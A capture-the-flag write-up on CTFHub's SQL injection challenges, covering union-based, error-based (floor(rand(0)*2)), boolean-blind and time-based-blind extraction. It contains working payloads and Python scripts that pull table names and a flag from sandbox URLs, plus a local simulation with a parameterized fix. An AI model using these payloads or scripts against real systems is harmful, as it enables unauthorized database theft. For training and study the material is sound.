CTFHub SQL skill tree: integer injection, string injection, error-based injection, boolean blind injection, time-based blind injection
- Integer injection
- String injection
- Error-based injection
- Boolean blind injection
- Time-based blind injection
Integer injection
First submit 1 and look at the response:
The page echoes the SQL statement it executed together with the ID and Data columns. Next determine how many columns the query returns:
1 order by 2 #
With order by 2 the page still renders normally, so the query has two columns. Next find which of them are echoed:
1111 union select 11,22 #
The id 1111 matches no real row, so only the UNION row is displayed, and both positions turn out to be echoed. Query the database version and the current database name:
1111 union select version(),database() #
The current database is sqli. Next list the tables in it:
11111 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
group_concat() collapses every table name into one string, which reveals two tables, news and flag. Next list the columns of the flag table:
11111 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' #
The flag table has a single column, also named flag. Read its contents:
11111 union select 1,flag from sqli.flag #
This returns the flag and completes the integer injection.
String injection
Again submit 1 and look at the response:
The page echoes the SQL statement, the ID and the Data as before. This challenge is known to be a string injection, so the procedure and the statements are the same as for the integer injection:
11111' union select 1,flag from sqli.flag #
The only difference is that the parameter is wrapped in quotes (id='1'), so the payload closes the opening quote with ' and lets # comment out the trailing quote. For the remaining steps refer to the integer injection.
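To make the integer and string steps above reproducible offline, here is an added example (not code from the write-up or from CTFHub) that replays the whole union-based procedure against a simulated vulnerable endpoint. It assumes an in-memory SQLite database in place of the challenge's MySQL instance, so table discovery reads sqlite_master and pragma_table_info() instead of information_schema, trailing SQL is commented out with "-- " instead of MySQL's "#", and the table names, news rows and flag value are constructed. The parameterized safe_query shows the fix beside the bug.

```python
"""Union-based extraction replayed against a simulated vulnerable endpoint.

Added example, not the write-up's code. SQLite stands in for MySQL, so
sqlite_master / pragma_table_info() replace information_schema and "-- "
replaces "#". All data below is constructed.
"""
import sqlite3

FLAG = "ctfhub{constructed_demo_flag}"   # constructed, not the challenge's flag


def make_db() -> sqlite3.Connection:
    """The two tables the write-up discovers (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE news(id INTEGER, data TEXT);"
        "INSERT INTO news VALUES (1, 'hello'), (2, 'world');"
        "CREATE TABLE flag(flag TEXT);"
    )
    conn.execute("INSERT INTO flag VALUES (?)", (FLAG,))
    return conn


def vulnerable_query(conn, user_id: str):
    """Integer-type injection point: id is concatenated into the SQL text."""
    return conn.execute("SELECT id, data FROM news WHERE id = " + user_id).fetchall()


def vulnerable_query_str(conn, user_id: str):
    """String-type injection point: the same, but the value sits in quotes."""
    return conn.execute("SELECT id, data FROM news WHERE id = '" + user_id + "'").fetchall()


def safe_query(conn, user_id: str):
    """Fixed form: a bound parameter is data, never SQL."""
    return conn.execute("SELECT id, data FROM news WHERE id = ?", (user_id,)).fetchall()


def count_columns(run, close="", max_cols=10) -> int:
    """Step 1: raise ORDER BY n until the database complains."""
    cols = 0
    for n in range(1, max_cols + 1):
        try:
            run("1%s order by %d -- " % (close, n))
            cols = n
        except sqlite3.OperationalError:
            break
    return cols


def union_extract(run, close="") -> dict:
    """Steps 2-5 of the write-up. `close` is "" for the integer variant and
    "'" for the string variant; that quote is the only difference."""
    cols = count_columns(run, close)
    filler = ",".join(str(i) for i in range(1, cols + 1))        # "1,2"
    # 1111 matches no real row, so only the UNION row comes back.
    echo = run("1111%s union select %s -- " % (close, filler))[0]
    tables = run("1111%s union select 1, group_concat(name) from sqlite_master "
                 "where type='table' -- " % close)[0][1]
    flag_cols = run("1111%s union select 1, group_concat(name) "
                    "from pragma_table_info('flag') -- " % close)[0][1]
    flag = run("1111%s union select 1, flag from flag -- " % close)[0][1]
    return {"columns": cols, "echo": echo, "tables": sorted(tables.split(",")),
            "flag_columns": flag_cols, "flag": flag}


def demo() -> dict:
    conn = make_db()
    return {
        "integer": union_extract(lambda p: vulnerable_query(conn, p)),
        "string": union_extract(lambda p: vulnerable_query_str(conn, p), close="'"),
        # With a bound parameter the same payload is just an id that matches nothing.
        "safe": safe_query(conn, "1111 union select 1, flag from flag -- "),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The ORDER BY probe, the non-matching id and the group_concat() listing are exactly the write-up's steps; only the catalogue tables and the comment syntax change with the database engine.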
Error-based injection
First submit 1 and look at the response:
Submitting 1' to test for injection produces an error message:
Submitting 1 # confirms it:
So this is an integer-type injection point whose database errors are echoed to the page. The payloads below use the floor(rand(0)*2) trick: grouping on a key that contains rand(0) makes MySQL try to insert the same group key twice, and the resulting "Duplicate entry '...&1' for key ..." error contains that key, which is whatever we concatenated into it (0x26 is an ampersand used as a separator). Query the database name:
1 Union select count(*),concat(database(),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
Replacing database() with a subquery against information_schema.tables and stepping limit 0,1 up to limit 1,1 and so on reads the table names one at a time:
This yields the two tables news and flag. Next list the columns of the flag table:
1 Union select count(*),concat((select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x
The column is named flag. Read its value:
1 Union select count(*),concat((select flag from flag limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x
This returns the flag and completes the error-based injection.
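The limit 0,1 / limit 1,1 stepping above is tedious by hand, so here is an added example (not the write-up's code) that automates it: it builds the write-up's floor(rand(0)*2) payload for successive offsets, parses the leaked value out of MySQL's duplicate-key error, and stops when the subquery runs out of rows. The HTTP layer is a `send` callback; `http_send` uses the write-up's URL, while `fake_server` is a constructed stand-in with made-up table and column names so the loop runs offline.

```python
"""Automating error-based extraction with limit N,1 (added example).

Not the write-up's code. `fake_server` and its table/column names are
constructed; `http_send` is the real transport and is not used offline.
"""
import html
import re

URL = "http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id="

# The value leaked by the duplicate-key trick sits between the quote and the
# "&<0|1>" that floor(rand(0)*2) appends. Pages often HTML-escape the quotes,
# hence html.unescape() before matching.
LEAK = re.compile(r"Duplicate entry '(.*?)&[01]' for key")

# 0x26 = '&', the separator between the leaked value and floor(rand(0)*2)
PAYLOAD = ("1 Union select count(*),concat(({sub} limit {off},1),0x26,"
           "floor(rand(0)*2))x from information_schema.columns group by x")

TABLES_SUB = ("select table_name from information_schema.tables "
              "where table_schema=database()")
COLUMNS_SUB = ("select column_name from information_schema.columns "
               "where table_schema='sqli' and table_name='flag'")


def build_payload(sub: str, off: int) -> str:
    return PAYLOAD.format(sub=sub, off=off)


def parse_leak(body: str):
    """Return the value leaked in the duplicate-key error, or None."""
    m = LEAK.search(html.unescape(body))
    return m.group(1) if m else None


def extract_all(send, sub: str, max_rows: int = 50) -> list:
    """Step the offset upward until no row is leaked. Past the last row the
    subquery yields NULL, concat() becomes NULL, the group key no longer
    varies with rand(0), and no duplicate-key error is raised."""
    out = []
    for off in range(max_rows):
        value = parse_leak(send(build_payload(sub, off)))
        if value is None:
            break
        out.append(value)
    return out


def http_send(payload: str) -> str:
    """Real transport: GET the payload and return the page body."""
    import requests
    return requests.get(URL + payload).text


def fake_server(answers: dict):
    """Constructed stand-in for the vulnerable page: for a known subquery it
    answers offset N with the MySQL error that leaks row N."""
    def send(payload: str) -> str:
        off = int(re.search(r"limit (\d+),1", payload).group(1))
        for sub, rows in answers.items():
            if sub in payload and off < len(rows):
                return ("ERROR 1062 (23000): Duplicate entry &#039;%s&amp;1&#039; "
                        "for key &#039;group_key&#039;" % rows[off])
        return "query_success"          # subquery exhausted: no error
    return send


def demo() -> dict:
    send = fake_server({TABLES_SUB: ["news", "flag"], COLUMNS_SUB: ["flag"]})
    return {"tables": extract_all(send, TABLES_SUB),
            "columns": extract_all(send, COLUMNS_SUB)}


if __name__ == "__main__":
    print(demo())        # swap fake_server for http_send to run it for real
```

The same loop reads the flag by passing "select flag from flag" as the subquery; each leaked value costs exactly one request, which is why error-based extraction is preferred over blind techniques whenever errors are echoed.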
Boolean blind injection
First submit 1 and look at the response:
The page reports that the query succeeded but never shows its result; the only other visible state is error, shown when the SQL statement fails (the page calls this a syntax error, but a runtime error such as a subquery returning more than one row triggers it as well, which is what the scripts below rely on). Try the column count:
1 order by 2 #
There are 2 columns. Blind injection means guessing a large amount of content one character at a time, so use a script. Every condition is wrapped in if(cond,1,(select table_name from information_schema.tables)): when cond is true the query runs with id=1 and the page shows query_success; when it is false the subquery returns several rows, the query errors, and query_success is absent. Query the current database name:
import requests
import string

url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
mark = 'query_success'   # present only when the injected condition is true


def database_name():
    name = ''
    for i in range(1, 9):                  # position in the name
        for j in string.ascii_letters:     # candidate character
            # true -> id=1, page shows query_success; false -> the subquery
            # returns several rows and the query errors
            url_db = url + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j)
            r = requests.get(url_db)
            if mark in r.text:
                name += j
                break
        else:
            break                          # no character matched: name is complete
    print('database_name:', name)


database_name()
The current database is sqli. Next the table names:
import requests
import string

url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
mark = 'query_success'


def table_name():
    names = []
    for i in range(0, 4):                  # table index (limit i,1)
        name = ''
        for j in range(1, 9):              # position in the table name
            for k in string.ascii_letters: # candidate character
                url_t = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
                r = requests.get(url_t)
                if mark in r.text:
                    name += k
                    break
            else:
                break                      # no character matched: name is complete
        names.append(name)
    print('table_name:', names)


table_name()
This gives two table names, news and flag. Next the columns of the flag table:
import requests
import string

url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
mark = 'query_success'


def columns_name():
    names = []
    for i in range(0, 3):                  # column index (limit i,1)
        name = ''
        for j in range(1, 9):              # position in the column name
            for k in string.ascii_letters: # candidate character
                url_c = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
                r = requests.get(url_c)
                if mark in r.text:
                    name += k
                    break
            else:
                break                      # no character matched: name is complete
        names.append(name)
    print('column_name:', names)


columns_name()
The column is also named flag. Read its contents, this time comparing ascii codes so that digits and punctuation are covered too:
import requests

url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
mark = 'query_success'


def data():
    name = ''
    for i in range(1, 50):                 # position in the flag
        for j in range(48, 126):           # ascii code of the candidate character
            url_d = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (i, j)
            r = requests.get(url_d)
            if mark in r.text:
                name += chr(j)
                break
        else:
            break                          # no code matched: end of the flag
    print('data:', name)


data()
This recovers the flag and completes the boolean blind injection.
Time-based blind injection
Here the page returns nothing at all, whichever way the query goes, so the only channel left is time: put sleep(3) in the true branch of if() and measure how long the response takes. A response slower than 2 seconds counts as true (the threshold is kept below 3 seconds to absorb timing noise). The script first recovers the database name:
import requests
import string
import time

url = 'http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id='


def database_name():
    name = ''
    for i in range(1, 9):                  # position in the name
        for j in string.ascii_letters:     # candidate character
            url_db = url + 'if(substr(database(),%d,1)="%s",sleep(3),1)' % (i, j)
            time_b = time.time()
            r = requests.get(url_db)
            time_f = time.time()
            if time_f - time_b > 2:        # sleep(3) fired: the guess is right
                name += j
                break
        else:
            break                          # no character matched: name is complete
    print('database_name:', name)


database_name()
The database name is sqli. Next the table names:
import requests
import string
import time

url = 'http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id='


def table_name():
    names = []
    for i in range(0, 2):                  # table index (limit i,1)
        name = ''
        for j in range(1, 9):              # position in the table name
            for k in string.ascii_letters: # candidate character
                url_t = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
                time_b = time.time()
                r = requests.get(url_t)
                time_f = time.time()
                if time_f - time_b > 2:    # sleep(3) fired: the guess is right
                    name += k
                    break
            else:
                break                      # no character matched: name is complete
        names.append(name)
    print('table_name:', names)


table_name()
This gives two table names, news and flag. Next the columns of the flag table:
import requests
import string
import time

url = 'http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id='


def columns_name():
    names = []
    for i in range(0, 1):                  # column index (limit i,1)
        name = ''
        for j in range(1, 9):              # position in the column name
            for k in string.ascii_letters: # candidate character
                url_c = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
                time_b = time.time()
                r = requests.get(url_c)
                time_f = time.time()
                if time_f - time_b > 2:    # sleep(3) fired: the guess is right
                    name += k
                    break
            else:
                break                      # no character matched: name is complete
        names.append(name)
    print('column_name:', names)


columns_name()
The column is also named flag. Read its contents:
import requests
import time

url = 'http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id='


def data():
    name = ''
    for i in range(1, 50):                 # position in the flag
        for j in range(48, 126):           # ascii code of the candidate character
            url_d = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,sleep(3),1)' % (i, j)
            # one timed request per guess (the original sent it twice)
            time_b = time.time()
            r = requests.get(url_d)
            time_f = time.time()
            if time_f - time_b > 2:        # sleep(3) fired: the guess is right
                name += chr(j)
                print(name)                # progress, since this run is slow
                break
        else:
            break                          # no code matched: end of the flag
    print('data:', name)


data()
This recovers the flag and completes the time-based blind injection.